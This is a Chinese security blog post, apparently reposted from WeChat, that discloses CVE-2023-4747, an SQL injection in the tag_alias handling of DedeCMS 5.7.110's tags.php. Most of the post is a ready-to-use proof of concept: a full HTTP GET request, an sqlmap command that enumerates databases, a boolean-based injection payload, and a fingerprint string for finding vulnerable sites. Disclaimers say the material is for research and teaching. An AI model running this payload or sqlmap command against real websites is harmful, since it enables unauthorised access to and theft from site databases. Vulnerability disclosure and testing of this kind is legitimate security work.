DedeCms | CVE-2023-4747(SQL注入)

2023年9月6日14:45:41评论307 views字数 1388阅读4分37秒阅读模式

免责声明  由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，WK安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

| 0x01 漏洞介绍

DedeCMS是一个集内容发布、编辑、管理检索等于一体的网站管理系统，是国内第一个开源的内容管理系统。它拥有国外CMS众多特点之外，还结合中国用户的需要，对内容管理系统概念进行明确分析和定位。

该漏洞影响文件/uploads/tags.php 的未知代码。对参数 tag_alias 的操作会导致 sql 注入
| 0x02 影响版本

DedeCMS 5.7.110

| 0x03 特征

app="DedeCMS"

DedeCms | CVE-2023-4747(SQL注入)

| 0x04 漏洞POC

POC：

GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1Host: xxxxsec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417Connection: close
SQLmap：sqlmap.py -u "http://xxxxxxxxx/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU

参考链接

 https://github.com/laoquanshi/cve/blob/main/dedecms%20%20sql%20%20injection

技术交流可加下方wx

DedeCms | CVE-2023-4747(SQL注入)

原文始发于微信公众号（WK安全）：DedeCms | CVE-2023-4747(SQL注入)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

DedeCms | CVE-2023-4747(SQL注入)

对抗性机器学习-攻击和缓解的分类和术语（三）

记一次带学员渗透母校

Nosql注入学习记录

SQL注入漏洞实战

基于K8s日志审计实现攻击行为检测

Dr4g0n b4ll_1

XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

发表评论

在线咨询

微信